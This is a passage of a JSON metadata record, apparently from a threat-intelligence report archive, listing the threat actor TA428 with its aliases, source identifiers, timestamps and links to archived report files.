"2023-01-06T13:46:39.042499Z", "updated_at": "2026-04-10T02:00:03.194713Z", "deleted_at": null, "main_name": "TA428", "aliases": [ "BRONZE DUDLEY", "Colourful Panda" ], "source_name": "MISPGALAXY:TA428", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434050, "ts_updated_at": 1775791998, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e634dbb50bdeebb07d4b95670c20db80376fe526.pdf", "text": "https://archive.orkl.eu/e634dbb50bdeebb07d4b95670c20db80376fe526.txt", "img": "https://archive.orkl.eu/e634dbb50bdeebb07d4b95670c20db80376fe526.jpg" } }